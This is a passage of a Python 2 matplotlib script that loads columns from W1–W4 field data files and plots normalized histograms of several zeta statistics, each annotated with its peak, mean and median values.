bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(452)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))\ns = \"75: %.3f,%.3f,%.3f\" % 
(bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{1}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 2\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=5\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(453)\nrangemax=4\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, 
bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(453)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{z}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 3\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, 
float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=7\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(454)\nrangemax=4\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, 
histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(454)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 4\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=9\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 
usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(456)\nrangemax=7\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, 
histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(456)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^2}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 5\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=11\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = 
